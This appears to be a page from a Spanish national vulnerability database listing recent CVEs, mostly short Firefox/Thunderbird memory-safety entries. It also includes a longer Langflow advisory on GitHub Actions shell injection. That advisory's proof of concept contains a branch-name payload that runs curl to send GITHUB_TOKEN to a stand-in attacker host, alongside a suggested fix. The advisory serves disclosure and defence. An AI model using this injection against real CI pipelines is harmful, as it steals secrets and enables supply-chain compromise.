Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2026-4709

Publication date:
24/03/2026
Incorrect boundary conditions in the Audio/Video: GMP component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4710

Publication date:
24/03/2026
Incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 149, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4692

Publication date:
24/03/2026
Sandbox escape in the Responsive Design Mode component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4693

Publication date:
24/03/2026
Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4694

Publication date:
24/03/2026
Incorrect boundary conditions, integer overflow in the Graphics component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4695

Publication date:
24/03/2026
Incorrect boundary conditions in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 149, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4696

Publication date:
24/03/2026
Use-after-free in the Layout: Text and Fonts component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4697

Publication date:
24/03/2026
Incorrect boundary conditions in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 149, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4698

Publication date:
24/03/2026
JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-4699

Publication date:
24/03/2026
Incorrect boundary conditions in the Layout: Text and Fonts component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026

CVE-2026-33475

Publication date:
24/03/2026
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.<br /> <br /> ---<br /> <br /> ### Details<br /> <br /> Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:<br /> <br /> ```yaml<br /> run: |<br /> validate_branch_name "${{ github.event.pull_request.head.ref }}"<br /> ```<br /> <br /> Or:<br /> <br /> ```yaml<br /> run: npx playwright install ${{ inputs.browsers }} --with-deps<br /> ```<br /> <br /> Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.<br /> <br /> ---<br /> <br /> ### PoC<br /> <br /> 1. **Fork** the Langflow repository<br /> 2. **Create a new branch** with the name:<br /> ```bash<br /> injection-test &amp;&amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN<br /> ```<br /> 3. **Open a Pull Request** to the main branch from the new branch<br /> 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)<br /> 5. The `run:` step containing:<br /> ```yaml<br /> echo "Branch: ${{ github.head_ref }}"<br /> ```<br /> Will execute:<br /> ```bash<br /> echo "Branch: injection-test"<br /> curl https://attacker.site/exfil?token=$GITHUB_TOKEN<br /> ```<br /> <br /> 6. The attacker receives the CI secret via the exfil URL.<br /> <br /> ---<br /> <br /> ### Impact<br /> <br /> - **Type:** Shell Injection / Remote Code Execution in CI<br /> - **Scope:** Any public Langflow fork with GitHub Actions enabled<br /> - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data<br /> <br /> ---<br /> <br /> ### Suggested Fix<br /> <br /> Refactor affected workflows to **use environment variables** and wrap them in **double quotes**:<br /> <br /> ```yaml<br /> env:<br /> BRANCH_NAME: ${{ github.head_ref }}<br /> run: |<br /> echo "Branch is: \"$BRANCH_NAME\""<br /> ```<br /> <br /> Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.<br /> <br /> ---<br /> <br /> ### Affected Files (Langflow `1.3.4`)<br /> <br /> - `.github/actions/install-playwright/action.yml`<br /> - `.github/workflows/deploy-docs-draft.yml`<br /> - `.github/workflows/docker-build.yml`<br /> - `.github/workflows/release_nightly.yml`<br /> - `.github/workflows/python_test.yml`<br /> - `.github/workflows/typescript_test.yml`
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026

CVE-2026-4684

Publication date:
24/03/2026
Race condition, use-after-free in the Graphics: WebRender component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.
Severity CVSS v4.0: Pending analysis
Last modification:
13/04/2026